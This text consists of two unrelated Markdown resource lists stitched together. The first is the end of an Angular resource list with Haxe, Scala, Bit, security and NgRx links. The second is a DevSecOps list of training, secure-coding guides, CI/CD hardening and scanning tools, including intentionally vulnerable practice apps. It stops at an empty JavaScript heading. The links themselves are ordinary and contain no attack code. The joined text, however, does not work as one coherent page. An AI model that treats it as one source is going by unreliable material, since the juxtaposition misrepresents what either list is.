> Server, client, mobile (Android and iOS at once), desktop, embedded (Raspbery, award winning TIVO set top boxes), Playstation ... all can be reached natively with much less typing, more error-proof, more stable and compile-time type checked code even for non type-safe targets (f.e. JavaScript, PHP)!
##### Haxe General Resources
* [Haxe.org](https://haxe.org)
* [Haxe on Wikipedia](https://en.wikipedia.org/wiki/Haxe)
* [Haxe Playground ](https://try.haxe.org/)
* [Haxe compiler targets](https://haxe.org/documentation/introduction/compiler-targets.html) compiler targets: C++, C#, Java, Python, PHP, ActionScript 3, and Flash or Neko bytecode
* [Haxe Usage Survey results](blog.onthewings.net/2015/11/14/haxe_usage_survey/)
* [Haxe discussion group](https://groups.google.com/forum/#!forum/haxelang) - community
* [Haxe and Node.js](matthijskamstra.github.io/haxenode/)
* [Haxe: working with JavaScript libraries](https://philippe.elsass.me/2014/11/haxe-working-with-javascript-libraries/)
* [Learn haxe in Y minutes](https://learnxinyminutes.com/docs/haxe/)
* [A success story for Haxe](https://nadako.tumblr.com/post/113390739725/a-success-story-for-haxe) - about porting JavaScript to haxe targeting both JavaScript and C# "without interrupting the development of actual game by the rest of the team!", "AWESOME BONUS", "there are only benefits"
* [News And Information For Haxe Developers](https://haxe.io/)
* [**{{** help_add_resources **}}**](https://github.com/PatrickJS/awesome-angular/edit/gh-pages/README.md)
#### Haxe Seed Projects
* [angular2haxe](https://github.com/nweedon/angular2haxe) Haxe Language Bindings for Angular 2
* [**{{** add_your_repo **}}**](https://github.com/PatrickJS/awesome-angular/edit/gh-pages/README.md)
---
### Angular 2 in Scala
> General purpose language; multiparadigm (object-oriented, functional, concurrent elements); statically typed, type-safe; focus: Web services.
##### Scala General Resources
* [**{{** help_add_resources **}}**](https://github.com/PatrickJS/awesome-angular/edit/gh-pages/README.md)
#### Scala Seed Projects
* [play-angular2](https://github.com/gdi2290/play-angular2)
* [**{{** add_your_repo **}}**](https://github.com/PatrickJS/awesome-angular/edit/gh-pages/README.md)
---
### Angular 2 components with Bit
> Bit is an open source virtual repository (code base) built to make components easily manageable and usable across applications. You can quickly export any Angular component from any context while working on any project to a bit distributed Scope. Bit's reusbale component environment cuts the overhead of configuring build and test environments for exporting every new component. The Scope is a virtual component repository which stores, organizes, manages and tests your components. Once modeled on a Scope, your components can be easily found and used in any Angular application. Components can be organized together and still modified and used individually without pulling in entire libraries.
##### Bit Resources
* [Bit](https://github.com/teambit/bit)
* [Bit-Javascript](https://github.com/teambit/bit-javascript)
* [bitsrc](https://bitsrc.io/) - Free community hub for sharing, managing and finding open source components.
---
#### Security
* [Angular.io Security Guide](https://angular.io/guide/security) - brief security guidance including Preventing cross-site scripting (XSS), Sanitization and Content security policy.
* So you thought you were safe using AngularJS? Think again! [Slides](https://www.owasp.org/images/4/46/OWASPLondon20170727_AngularJS.pdf), [Video](https://www.youtube.com/watch?v=3vuLPzjc4RI) - Lewis Ardern speaking at OWASP London 2017
##### Authentication
* [Angular 2 with OpenID Connect Implicit Flow from Damien Bowden](https://damienbod.com/2016/03/02/angular2-openid-connect-implicit-flow-with-identityserver4/)
* [Angular 2 bootstrap4 OAuth2 Webpack from Michael Oryl](https://github.com/michaeloryl/angular2-bootstrap4-oauth2-webpack)
* [Angular 2 OAuth2 OIDC from Manfred Steyer](https://www.softwarearchitekt.at/post/2016/07/03/authentication-in-angular-2-with-oauth2-oidc-and-guards-for-the-newest-new-router-english-version.aspx)
* [Angular 2 authentication sample from auth0-blog](https://github.com/auth0-blog/angular2-authentication-sample)
#### NgRx
* [Comprehensive Introduction to @ngrx/store](https://gist.github.com/btroncone/a6e4347326749f938510)
* [Adding Redux With NgRx/store and Angular2 - Part 1](https://orizens.com/blog/adding-redux-with-ngrxstore-to-angular-2-part-1/)
* [Adding Redux with NgRx/store to Angular2 – Part 2 (Testing
Reducers)](https://orizens.com/blog/adding-redux-with-ngrxstore-to-angular2-part-2-testing-reducers/)
* [Making chained API Calls using @ngrx/Effects](https://gist.github.com/peterbsmith2/ce94c0a5ddceb99bab24a761731d1f07)
* [Authentication in Angular with NGRX](https://mherman.org/blog/2018/04/17/authentication-in-angular-with-ngrx)
---
enjoy — [**PatrickJS**](https://twitter.com/PatrickJS__)
---
## License
[![CC0](https://licensebuttons.net/p/zero/1.0/88x31.png)](https://creativecommons.org/publicdomain/zero/1.0/)
|
Welcome to our comprehensive collection of learning resources for **DevSecOps**! Here, you'll discover a curated list of the best learning materials we've assembled just for you.
Take a moment to explore these valuable resources, handpicked to enhance your understanding of **DevSecOps**. We strive to provide the most up-to-date and informative content available.
<h1 align="center">
<br>
<a href=""><img src="https://user-images.githubusercontent.com/13212227/99404580-2374f000-292f-11eb-9348-284f24cca88c.png" alt="" width="500px;"></a>
<br>
</h1>
<!-- omit in toc -->
## Contents
- [Resources](#resources)
- [Books](./Books/)
- [Articles](#articles)
- [Books](#books)
- [Communities](#communities)
- [Conferences](#conferences)
- [Newsletters](#newsletters)
- [Podcasts](#podcasts)
- [Secure Development Guidelines](#secure-development-guidelines)
- [Secure Development Lifecycle Framework](#secure-development-lifecycle-framework)
- [Toolchains](#toolchains)
- [Training](#training)
- [Wikis](#wikis)
- [Tools](#tools)
- [Dependency Management](#dependency-management)
- [Dynamic Analysis](#dynamic-analysis)
- [Infrastructure as Code Analysis](#infrastructure-as-code-analysis)
- [Intentionally Vulnerable Applications](#intentionally-vulnerable-applications)
- [Monitoring](#monitoring)
- [Secrets Management](#secrets-management)
- [Secrets Scanning](#secrets-scanning)
- [Static Analysis](#static-analysis)
- [Supply Chain Security](#supply-chain-security)
- [Threat Modelling](#threat-modelling)
- [Related Lists](#related-lists)
## Resources
### 0. DevSecOps Overview
- Overview
1. [DevSecOps in Wikipedia](https://en.wikipedia.org/wiki/DevOps#DevSecOps,_Shifting_Security_Left)
2. [Zero to DevSecOps (OWASP Meetup)](https://owasp.org/www-chapter-belgium/assets/2019/2019-02-20/Zero-to-DevSecOps-OWASP-Meetup-02-19-19.pdf)
3. [DevSecOps What Why And How (BlackHat USA-19)](https://i.blackhat.com/USA-19/Thursday/us-19-Shrivastava-DevSecOps-What-Why-And-How.pdf)
4. [DevSecOps – Security and Test Automation (Mitre)](https://www.mitre.org/sites/default/files/publications/pr-19-0769-devsecops_security_test_automation-briefing.pdf)
5. [DevSecOps: Making Security Central To Your DevOps Pipeline](https://spacelift.io/blog/what-is-devsecops)
6. [Strengthen and Scale security using DevSecOps](https://owasp.org/www-pdf-archive/Devsecops-owasp-indonesia.pdf)
### 1. Design
- Development Lifecycle
1. [SDL(Secure Development Lifecycle) by Microsoft](https://www.microsoft.com/en-us/securityengineering/sdl/practices)
2. [OWASP's Software Assurance Maturity Model](https://github.com/OWASP/samm)
3. [Building Security In Maturity Model (BSIMM)](https://www.bsimm.com/framework.html)
4. [NIST's Secure Software Developerment Framework](https://csrc.nist.gov/CSRC/media/Publications/white-paper/2019/06/07/mitigating-risk-of-software-vulnerabilities-with-ssdf/draft/documents/ssdf-for-mitigating-risk-of-software-vulns-draft.pdf)
5. [DevSecOps basics: 9 tips for shifting left (Gitlab)](https://about.gitlab.com/blog/2020/06/23/efficient-devsecops-nine-tips-shift-left/)
6. [6 Ways to bring security to the speed of DevOps (Gitlab)](https://about.gitlab.com/blog/2019/10/31/speed-security-devops/)
- Threat Model
1. [What is Threat Modeling / Wikipedia](https://en.wikipedia.org/wiki/Threat_model)
2. [Threat Modeling by OWASP](https://owasp.org/www-community/Threat_Modeling)
3. [Application Threat Modeling by OWASP](https://owasp.org/www-community/Application_Threat_Modeling)
4. [Agile Threat Modeling Toolkit](https://threagile.io)
5. [OWASP Threat Dragon](https://threatdragon.github.io)
### 2. Develop
- Secure Coding
1. [Secure coding guide by Apple](https://developer.apple.com/library/archive/documentation/Security/Conceptual/SecureCodingGuide/Introduction.html)
2. [Secure Coding Guidelines for Java SE](https://www.oracle.com/java/technologies/javase/seccodeguide.html)
3. [Go-SCP / Go programming language secure coding practices guide](https://github.com/OWASP/Go-SCP)
4. [Android App security best practices by Google](https://developer.android.com/topic/security/best-practices)
5. [Securing Rails Applications](https://guides.rubyonrails.org/security.html)
### 3. Build
- SAST(Static Application Security Testing)
1. [Scan Source Code using Static Application Security Testing (SAST) with SonarQube, Part 1](https://medium.com/nycdev/scan-your-source-code-for-vulnerabilities-using-static-application-security-testing-sast-with-5f8ee1fdf9aa)
2. [Announcing third-party code scanning tools: static analysis & developer security training](https://github.blog/2020-10-05-announcing-third-party-code-scanning-tools-static-analysis-and-developer-security-training/)
### 4. Test
- DAST(Dynamic Application Security Testing)
1. [Dynamic Application Security Testing with ZAP and GitHub Actions](https://www.zaproxy.org/blog/2020-05-15-dynamic-application-security-testing-with-zap-and-github-actions/)
2. [Dynamic Application Security Testing (DAST) in Gitlab](https://docs.gitlab.com/ee/user/application_security/dast/)
3. [DAST using pdiscoveryio Nuclei (github action)](https://github.com/secopslab/nuclei-action)
4. [ZAPCon 2021-Democratizing ZAP with test automation and domain specific languages](https://youtu.be/jimW-R6_F4U)
- Penetration testing
1. [Penetration Testing at DevSecOps Speed](https://securityboulevard.com/2019/04/penetration-testing-at-devsecops-speed/)
### 5. Deploy
- Security Hardening & Config
1. [CIS Benchmarks](https://www.cisecurity.org/cis-benchmarks/)
2. [DevSecOps in Kubernetes](https://cloudblogs.microsoft.com/opensource/2019/07/22/devsecops-in-kubernetes/)
- Security Scanning
1. [Best practices for scanning images (docker)](https://docs.docker.com/develop/scan-images/)
### 6. Operate and Monitor
- RASP(Run-time Application Security Protection)
1. [Runtime Application Self-Protection by rapid7](https://www.rapid7.com/fundamentals/runtime-application-self-protection/)
2. [Jumpstarting your devsecops - Pipeline with IAST and RASP](https://2018.appsec.eu/presos/DevOps_Jumpstarting-Your-DevSecOps_Jeff-Williams_AppSecEU2018.pdf)
- Security Patch
1. RASP(Runtime Application Self-Protection)
- Security Audit
- Security Monitor
1. IAST(Interactive Application Security Testing)
2. Metrics, Monitoring, Alerting
- Security Analysis
1. [Attack Surface Analysis Cheat Sheet by OWASP](https://cheatsheetseries.owasp.org/cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html)
## Security of CICD
- Github Actions
1. [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions)
2. [Github Actions Security Best Practices](https://engineering.salesforce.com/github-actions-security-best-practices-b8f9df5c75f5)
3. [GitHub Actions Security Best Practices [cheat sheet included]](https://blog.gitguardian.com/github-actions-security-cheat-sheet/)
- Jenkins
1. [Securing Jenkins](https://www.jenkins.io/doc/book/security/)
2. [Securing Jenkins CI Systems by SANS](https://www.sans.org/white-papers/36872/)
3. [DEPRECATED/chef-jenkins-hardening](https://github.com/dev-sec/chef-jenkins-hardening)
### Articles
- [Our Approach to Employee Security Training](https://www.pagerduty.com/blog/security-training-at-pagerduty/) - _Pager Duty_ - Guidelines to running security training within an organisation.
### Books
- [Alice and Bob Learn Application Security](https://www.wiley.com/en-gb/Alice+and+Bob+Learn+Application+Security-p-9781119687405) - _Tanya Janca_ - An accessible and thorough resource for anyone seeking to incorporate, from the beginning of the System Development Life Cycle, best security practices in software development.
### Communities
- [MyDevSecOps](https://www.mydevsecops.io/) - _Snyk_ - A community that runs conferences, a blog, a podcast and a Slack workspace dedicated to DevSecOps.
### Conferences
- [AppSec Day](https://appsecday.io/) - _OWASP_ - An Australian application security conference run by OWASP.
- [DevSecCon](https://www.devseccon.com/) - _Snyk_ - A network of DevSecOps conferences run by Snyk.
### Newsletters
- [Shift Security Left](https://shift-security-left.curated.co/) - _Cossack Labs_ - A free biweekly newsletter for security-aware developers covering application security, secure architecture, DevSecOps, cryptography, incidents, etc. that can be useful for builders and (to a lesser extent) for breakers.
### Podcasts
- [Absolute AppSec](https://absoluteappsec.com/) - _Seth Law & Ken Johnson_ - Discussions about current events and specific topics related to application security.
- [Application Security Podcast](https://podcast.securityjourney.com/) - _Security Journey_ - Interviews with industry experts about specific application security concepts.
- [BeerSecOps](https://blog.aquasec.com/devsecops-podcasts) - _Aqua Security_ - Breaking down the silos of Dev, Sec and Ops, discussing topics that span these subject areas.
- [DevSecOps Podcast Series](https://soundcloud.com/owasp-podcast) - _OWASP_ - Discussions with thought leaders and practitioners to integrate security into the development lifecycle.
- [The Secure Developer](https://www.mydevsecops.io/the-secure-developer-podcast) - _Snyk_ - Discussion about security tools and best practices for software developers.
### Secure Development Guidelines
- [Application Security Verification Standard](https://owasp.org/www-project-application-security-verification-standard/) - _OWASP_ - A framework of security requirements and controls to help developers design and develop secure web applications.
- [Coding Standards](https://wiki.sei.cmu.edu/confluence/display/seccode/SEI+CERT+Coding+Standards) - _CERT_ - A collection of secure development standards for C, C++, Java and Android development.
- [Fundamental Practices for Secure Software Development](https://safecode.org/wp-content/uploads/2018/03/SAFECode_Fundamental_Practices_for_Secure_Software_Development_March_2018.pdf) - _SAFECode_ - Guidelines for implementing key secure development practices throughout the SDLC.
- [Proactive Controls](https://owasp.org/www-project-proactive-controls/) - _OWASP_ - OWASP's list of top ten controls that should be implemented in every software development project.
- [Secure Coding Guidelines](https://wiki.mozilla.org/WebAppSec/Secure_Coding_Guidelines) - _Mozilla_ - A guideline containing specific secure development standards for secure web application development.
- [Secure Coding Practices Quick Reference Guide](https://owasp.org/www-pdf-archive/OWASP_SCP_Quick_Reference_Guide_v2.pdf) - _OWASP_ - A checklist to verify that secure development standards have been followed.
### Secure Development Lifecycle Framework
- [Building Security In Maturity Model (BSIMM)](https://www.bsimm.com/framework.html) - _Synopsys_ - A framework for software security created by observing and analysing data from leading software security initiatives.
- [Secure Development Lifecycle](https://www.microsoft.com/en-us/securityengineering/sdl/practices) - _Microsoft_ - A collection of tools and practices that serve as a framework for the secure development lifecycle.
- [Secure Software Development Framework](https://csrc.nist.gov/CSRC/media/Publications/white-paper/2019/06/07/mitigating-risk-of-software-vulnerabilities-with-ssdf/draft/documents/ssdf-for-mitigating-risk-of-software-vulns-draft.pdf) - _NIST_ - A framework consisting of practices, tasks and implementation examples for a secure development lifecycle.
- [Software Assurance Maturity Model](https://github.com/OWASP/samm) - _OWASP_ - A framework to measure and improve the maturity of the secure development lifecycle.
### Toolchains
- [Cloud Security and DevSecOps Best Practices _and_ Securing Web Application Technologies (SWAT) Checklist](https://www.sans.org/posters/cloud-security-devsecops-best-practices/) - _SANS_ - A poster containing the Securing Web Application Technologies (SWAT) Checklist, SANS Cloud Security Curriculum, Cloud Security Top 10, Top 12 Kubernetes Threats, and Secure DevOps Toolchain.
- [Periodic Table of DevOps Tools](https://xebialabs.com/periodic-table-of-devops-tools/) - _XebiaLabs_ - A collection of DevSecOps tooling categorised by tool functionality.
### Training
- [Application Security Education](https://github.com/duo-labs/appsec-education) - _Duo Security_ - Training materials created by the Duo application security team, including introductory and advanced training presentations and hands-on labs.
- [Cybrary](https://www.cybrary.it/) - _Cybrary_ - Subscription based online courses with dedicated categories for cybersecurity and DevSecOps.
- [PentesterLab](https://pentesterlab.com/) - _PentesterLab_ - Hands on labs to understand and exploit simple and advanced web vulnerabilities.
- [Practical DevSecOps](https://www.practical-devsecops.com) - _Practical DevSecOps_ - Learn DevSecOps concepts, tools, and techniques from industry experts with practical DevSecOps using state of the art browser-based labs.
- [SafeStack](https://academy.safestack.io/) - _SafeStack_ - Security training for software development teams, designed to be accessible to individuals and small teams as well as larger organisations.
- [Secure Code Warrior](https://www.securecodewarrior.com/) - _Secure Code Warrior_ - Gamified and hands-on secure development training with support for courses, assessments and tournaments.
- [SecureFlag](https://www.secureflag.com/platform.html) - _OWASP_ - Hands-on secure coding training for Developers and Build/Release Engineers.
- [Security Training for Engineers](https://sudo.pagerduty.com/for_engineers/) - _Pager Duty_ - A presentation created and open-sourced by PagerDuty to provide security training to software engineers.
- [Security Training for Everyone](https://sudo.pagerduty.com/for_everyone/) - _Pager Duty_ - A presentation created and open-sourced by PagerDuty to provide security training employees.
- [Web Security Academy](https://portswigger.net/web-security) - _PortSwigger_ - A set of materials and labs to learn and exploit common web vulnerabilities.
- [WeHackPuple](https://wehackpurple.com/) - _WeHackPurple_ - Online courses that teach application security theory and hands-on technical lessons.
### Wikis
- [DevSecOps Hub](https://snyk.io/devsecops/) - _Snyk_ - Introduction to key DevSecOps concepts, processes and technologies.
- [SecureFlag Knowledge Base](https://knowledge-base.secureflag.com/) - _OWASP_ - A repository of information about software vulnerabilities and how to prevent them.
## Tools
### Dependency Management
Open source software packages can speed up the development process by allowing developers to implement functionality without having to write all of the code. However, with the open source code comes open source vulnerabilities. Dependency management tools help manage vulnerabilities in open source packages by identifying and updating packages with known vulnerabilities.
- [Deepfence ThreatMapper](https://github.com/deepfence/ThreatMapper) - Apache v2, powerful runtime vulnerability scanner for kubernetes, virtual machines and serverless.
- [Dependabot](https://dependabot.com/) - _GitHub_ - Automatically scan GitHub repositories for vulnerabilities and create pull requests to merge in patched dependencies.
- [Dependency-Check](https://owasp.org/www-project-dependency-check/) - _OWASP_ - Scans dependencies for publicly disclosed vulnerabilities using CLI or build server plugins.
- [Dependency-Track](https://dependencytrack.org/) - _OWASP_ - Monitor the volume and severity of vulnerable dependencies across multiple projects over time.
- [JFrog XRay](https://jfrog.com/xray/) - _JFrog_ - Security and compliance analysis for artifacts stored in JFrog Artifactory.
- [NPM Audit](https://docs.npmjs.com/cli/audit) - _NPM_ - Vulnerable package auditing for node packages built into the npm CLI.
- [Renovate](https://renovate.whitesourcesoftware.com/) - _WhiteSource_ - Automatically monitor and update software dependencies for multiple frameworks and languages using a CLI or git repository apps.
- [Requires.io](https://requires.io/) - _Olivier Mansion & Alexis Tabary_ - Automated vulnerable dependency monitoring and upgrades for Python projects.
- [Snyk Open Source](https://snyk.io/) - _Snyk_ - Automated vulnerable dependency monitoring and upgrades using Snyk's dedicated vulnerability database.
### Dynamic Analysis
Dynamic Analysis Security Testing (DAST) is a form of black-box security testing where a security scanner interacts with a running instance of an application, emulating malicious activity to find common vulnerabilities. DAST tools are commonly used in the initial phases of a penetration test, and can find vulnerabilities such as cross-site scripting, SQL injection, cross-site request forgery and information disclosure.
- [Automatic API Attack Tool](https://github.com/imperva/automatic-api-attack-tool) - _Imperva_ - Perform automated security scanning against an API based on an API specification.
- [BurpSuite Enterprise Edition](https://portswigger.net/burp/enterprise) - _PortSwigger_ - BurpSuite's web application vulnerability scanner used widely by penetration testers, modified with CI/CD integration and continuous monitoring over multiple web applications.
- [Gauntlt](https://github.com/gauntlt/gauntlt) - _Gauntlt_ - A Behaviour Driven Development framework to run security scans using common security tools and test output, defined using Gherkin syntax.
- [Netz](https://github.com/spectralops/netz) - _Spectral_ - Discover internet-wide misconfigurations, using zgrab2 and others.
- [SSL Labs Scan](https://github.com/ssllabs/ssllabs-scan) - _SSL Labs_ - Automated scanning for SSL / TLS configuration issues.
- [Zed Attack Proxy (ZAP)](https://github.com/zaproxy/zaproxy) - _OWASP_ - An open-source web application vulnerability scanner, including an API for CI/CD integration.
### Infrastructure as Code Analysis
Infrastructure as Code allows applications to be deployed reliably to a consistent environment. This not only ensures that infrastructure is consistently hardened, but also provides an opportunity to statically and dynamically analyse infrastructure definitions for vulnerable dependencies, hard-coded secrets, insecure configuration and unintentional changes in security configuration. The following tools facilitate this analysis.
#### Multi-Platform
- [Checkov](https://github.com/bridgecrewio/checkov) - _Bridgecrew_ - Scan Terraform, AWS CloudFormation and Kubernetes templates for insecure configuration.
- [KICS](https://github.com/Checkmarx/kics) - _Checkmarx_ - Find security vulnerabilities, compliance issues, and infrastructure misconfigurations early in the development cycle.
- [Spectral DeepConfig](https://spectralops.io/blog/spectral-launches-deepconfig-to-ensure-no-misconfiguration-at-all-layers-of-software/) - _Spectral_ - Find misconfiguration both in infrastructure as well as apps as early as commit time.
- [Terrascan](https://github.com/accurics/terrascan) - _Accurics_ - Detect compliance and security violations across Infrastructure as Code to mitigate risk before provisioning cloud native infrastructure.
<!-- omit in toc -->
#### Cloud Formation
- [Cfn Nag](https://github.com/stelligent/cfn_nag) - _Stelligent_ - Scan AWS CloudFormation templates for insecure configuration.
<!-- omit in toc -->
#### Containers
- [Anchore Engine](https://anchore.com/opensource/) - _Anchore, Inc_ - Deep inspection of Docker images for CVEs and checking against custom policies. Engine behind their enterprise products that integrate against registries, orchestrators and CI/CD products.
- [Clair](https://github.com/quay/clair) - _Quay_ - Scan App Container and Docker containers for publicly disclosed vulnerabilities.
- [Dagda](https://github.com/eliasgranderubio/dagda/) - _Elías Grande_ - Compares OS and software dependency versions installed in Docker containers with public vulnerability databases, and also performs virus scanning.
- [Docker-Bench-Security](https://github.com/docker/docker-bench-security) - _Docker_ - The Docker Bench for Security is a script that checks for dozens of common best-practices around deploying Docker containers in production.
- [Hadolint](https://github.com/hadolint/hadolint) - _Hadolint_ - Checks a Dockerfile against known rules and validates inline bash code in RUN statements.
- [Snyk Container](https://snyk.io/product/container-vulnerability-management/) - _Snyk_ - Scan Docker and Kubernetes applications for security vulnerabilities during CI/CD or via continuous monitoring.
- [Trivy](https://github.com/aquasecurity/trivy) - _Aqua Security_ - Simple and comprehensive vulnerability scanner for containers.
<!-- omit in toc -->
#### Terraform
- [Regula](https://github.com/fugue/regula) - _Fugue_ - Evaluate Terraform infrastructure-as-code for potential security misconfigurations and compliance violations prior to deployment.
- [Terraform Compliance](https://terraform-compliance.com/) - _terraform-compliance_ - A lightweight, security and compliance focused test framework against terraform to enable negative testing capability for your infrastructure-as-code.
- [Tfsec](https://github.com/liamg/tfsec) - _Liam Galvin_ - Scan Terraform templates for security misconfiguration and noncompliance with AWS, Azure and GCP security best practice.
<!-- omit in toc -->
#### Kubernetes
- [Kube-Score](https://github.com/zegl/kube-score) - _Gustav Westling_ - Scan Kubernetes object definitions for security and performance misconfiguration.
- [Kubectrl Kubesec](https://github.com/controlplaneio/kubectl-kubesec) - _ControlPlane_ - Plugin for kubesec.io to perform security risk analysis for Kubernetes resources.
#### Ansible
- [Ansible-Lint](https://github.com/ansible-community/ansible-lint) - _Ansible Community_ - Checks playbooks for practices and behaviour that could potentially be improved. As a community backed project ansible-lint supports only the last two major versions of Ansible.
### Intentionally Vulnerable Applications
Intentionally vulnerable applications are often useful when developing security tests and tooling to provide a place you can run tests and make sure they fail correctly. These applications can also be useful for understanding how common vulnerabilities are introduced into applications and let you practice your skills at exploiting them.
- [Bad SSL](https://github.com/chromium/badssl.com) - _The Chromium Project_ - A container running a number of webservers with poor SSL / TLS configuration. Useful for testing tooling.
- [Cfngoat](https://github.com/bridgecrewio/cfngoat) - _Bridgecrew_ - Cloud Formation templates for creating stacks of intentionally insecure services in AWS. Ideal for testing the Cloud Formation Infrastructure as Code Analysis tools above.
- [Damn Vulnerable Web App](http://www.dvwa.co.uk/) - _Ryan Dewhurst_ - A web application that provides a safe environment to understand and exploit common web vulnerabilities.
- [Juice Shop](https://github.com/bkimminich/juice-shop) - _OWASP_ - A web application containing the OWASP Top 10 security vulnerabilities and more.
- [NodeGoat](https://github.com/OWASP/NodeGoat) - _OWASP_ - A Node.js web application that demonstrates and provides ways to address common security vulnerabilities.
- [Terragoat](https://github.com/bridgecrewio/terragoat) - _Bridgecrew_ - Terraform templates for creating stacks of intentionally insecure services in AWS, Azure and GCP. Ideal for testing the Terraform Infrastructure as Code Analysis tools above.
- [Vulnerable Web Apps Directory](https://owasp.org/www-project-vulnerable-web-applications-directory) - _OWASP_ - A collection of vulnerable web applications for learning purposes.
### Monitoring
It's not enough to test and harden our software in the lead up to a release. We must also monitor our production software for usage, performance and errors to capture malicious behavior and potential security flaws that we may need to respond to or address. A wide variety of tools are available to monitor different aspects of production software and infrastructure.
- [Csper](https://csper.io/report-uri) - _Csper_ - A set of Content Security Policy tools that can test policies, monitor CSP reports and provide metrics and alerts.
### Secrets Management
The software we write needs to use secrets (passwords, API keys, certificates, database connection strings) to access resources, yet we cannot store secrets within the codebase as this leaves them vulnerable to compromise. Secret management tools provide a means to securely store, access and manage secrets.
- [Ansible Vault](https://docs.ansible.com/ansible/latest/user_guide/vault.html) - _Ansible_ - Securely store secrets within Ansible pipelines.
- [AWS Key Management Service (KMS)](https://aws.amazon.com/kms/) - _Amazon AWS_ - Create and manage cryptographic keys in AWS.
- [AWS Secrets Manager](https://aws.amazon.com/secrets-manager/) - _Amazon AWS_ - Securely store retrievable application secrets in AWS.
- [Azure Key Vault](https://azure.microsoft.com/en-au/services/key-vault/) - _Microsoft Azure_ - Securely store secrets within Azure.
- [BlackBox](https://github.com/StackExchange/blackbox) - _StackExchange_ - Encrypt credentials within your code repository.
- [Chef Vault](https://github.com/chef/chef-vault) - _Chef_ - Securely store secrets within Chef.
- [CredStash](https://github.com/fugue/credstash) - _Fugue_ - Securely store secrets within AWS using KMS and DynamoDB.
- [CyberArk Application Access Manager](https://www.cyberark.com/products/privileged-account-security-solution/application-access-manager/) - _CyberArk_ - Secrets management for applications including secret rotation and auditing.
- [Docker Secrets](https://docs.docker.com/engine/swarm/secrets/) - _Docker_ - Store and manage access to secrets within a Docker swarm.
- [Git Secrets](https://github.com/awslabs/git-secrets) - _Amazon AWS_ - Scan git repositories for secrets committed within code or commit messages.
- [Gopass](https://github.com/gopasspw/gopass) - _Gopass_ - Password manager for teams relying on Git and gpg. Manages secrets in encrypted files and repositories.
- [Google Cloud Key Management Service (KMS)](https://cloud.google.com/kms) - _Google Cloud Platform_ - Securely store secrets within GCP.
- [HashiCorp Vault](https://www.vaultproject.io/) - _HashiCorp_ - Securely store secrets via UI, CLI or HTTP API.
- [Keyscope](https://github.com/SpectralOps/keyscope) - _Spectral_ - Keyscope is an open source key and secret workflow tool (validation, invalidation, etc.) built in Rust.
- [Pinterest Knox](https://github.com/pinterest/knox) - _Pinterest_ - Securely store, rotate and audit secrets.
- [Secrets Operations (SOPS)](https://github.com/mozilla/sops) - _Mozilla_ - Encrypt keys stored within YAML, JSON, ENV, INI and BINARY files.
- [Teller](https://github.com/spectralops/teller) - _Spectral_ - A secrets management tool for developers - never leave your command line for secrets.
### Secrets Scanning
Source control is not a secure place to store secrets such as credentials, API keys or tokens, even if the repo is private. Secrets scanning tools can scan and monitor git repositories and pull-requests for secrets, and can be used to prevent secrets from being committed, or to find and remove secrets that have already been committed to source control.
- [CredScan](https://secdevtools.azurewebsites.net/helpcredscan.html) - _Microsoft_ - A credential scanning tool that can be run as a task in Azure DevOps pipelines.
- [Detect Secrets](https://github.com/Yelp/detect-secrets) - _Yelp_ - An aptly named module for (surprise, surprise) detecting secrets within a code base.
- [GitGuardian](https://www.gitguardian.com/) - _GitGuardian_ - A web-based solution that scans and monitors public and private git repositories for secrets.
- [Gitleaks](https://github.com/zricethezav/gitleaks) - _Zachary Rice_ - Gitleaks is a SAST tool for detecting hardcoded secrets like passwords, api keys, and tokens in git repositories.
- [git-secrets](https://github.com/awslabs/git-secrets) - _AWS Labs_ - Scans commits, commit messages and merges for secrets. Native support for AWS secret patterns, but can be configured to support other patterns.
- [Nightfall](https://nightfall.ai/solutions/product/github) - _Nightfall_ - A web-based platform that monitors for sensitive data disclosure across several SDLC tools, including GitHub repositories.
- [Repo-supervisor](https://github.com/auth0/repo-supervisor) - _Auth0_ - Secrets scanning tool that can run as a CLI, as a Docker container or in AWS Lambda.
- [SpectralOps](https://spectralops.io) - _Spectral_ - Automated code security, secrets, tokens and sensitive data scanning.
- [truffleHog](https://github.com/trufflesecurity/truffleHog) - _Truffle Security_ - Searches through git repositories for secrets, digging deep into commit history and branches.
### Static Analysis
Static Analysis Security Testing (SAST) tools scan software for vulnerabilities without executing the target software. Typically, static analysis will scan the source code for security flaws such as the use of unsafe functions, hard-coded secrets and configuration issues. SAST tools often come in the form of IDE plugins and CLIs that can be integrated into CI/CD pipelines.
<!-- omit in toc -->
#### Multi-Language Support
- [DevSkim](https://github.com/microsoft/DevSkim) - _Microsoft_ - A set of IDE plugins, CLIs and other tools that provide security analysis for a number of programming languages.
- [Graudit](https://github.com/wireghoul/graudit/) - _Eldar Marcussen_ - Grep source code for potential security flaws with custom or pre-configured regex signatures.
- [Hawkeye](https://github.com/hawkeyesec/scanner-cli) - _Hawkeyesec_ - Modularised CLI tool for project security, vulnerability and general risk highlighting.
- [LGTM](https://lgtm.com/) - _Semmle_ - Scan and monitor code for security vulnerabilities using custom or built-in CodeQL queries.
- [RIPS](https://www.ripstech.com/) - _RIPS Technologies_ - Automated static analysis for PHP, Java and Node.js projects.
- [SemGrep](https://semgrep.dev/) - _r2c_ - Semgrep is a fast, open-source, static analysis tool that finds bugs and enforces code standards at editor, commit, and CI time.
- [SonarLint](https://www.sonarlint.org/) - _SonarSource_ - An IDE plugin that highlights potential security security issues, code quality issues and bugs.
- [SonarQube](https://www.sonarqube.org/) - _SonarSource_ - Scan code for security and quality issues with support for a wide variety of languages.
<!-- omit in toc -->
#### C / C++
- [FlawFinder](https://github.com/david-a-wheeler/flawfinder) - _David Wheeler_ - Scan C / C++ code for potential security weaknesses.
<!-- omit in toc -->
#### C#
- [Puma Scan](https://github.com/pumasecurity/puma-scan) - _Puma Security_ - A Visual Studio plugin to scan .NET projects for potential security flaws.
<!-- omit in toc -->
#### Configuration Files
- [Conftest](https://github.com/instrumenta/conftest) - _Instrumenta_ - Create custom tests to scan any configuration file for security flaws.
<!-- omit in toc -->
#### Java
- [Deep Dive](https://discotek.ca/deepdive.xhtml) - _Discotek.ca_ - Static analysis for JVM deployment units including Ear, War, Jar and APK.
- [Find Security Bugs](https://github.com/find-sec-bugs/find-sec-bugs/) - _OWASP_ - SpotBugs plugin for security audits of Java web applications. Supports Eclipse, IntelliJ, Android Studio and SonarQube.
- [SpotBugs](https://github.com/spotbugs/spotbugs) - _SpotBugs_ - Static code analysis for Java applications.
<!-- omit in toc -->
#### JavaScript
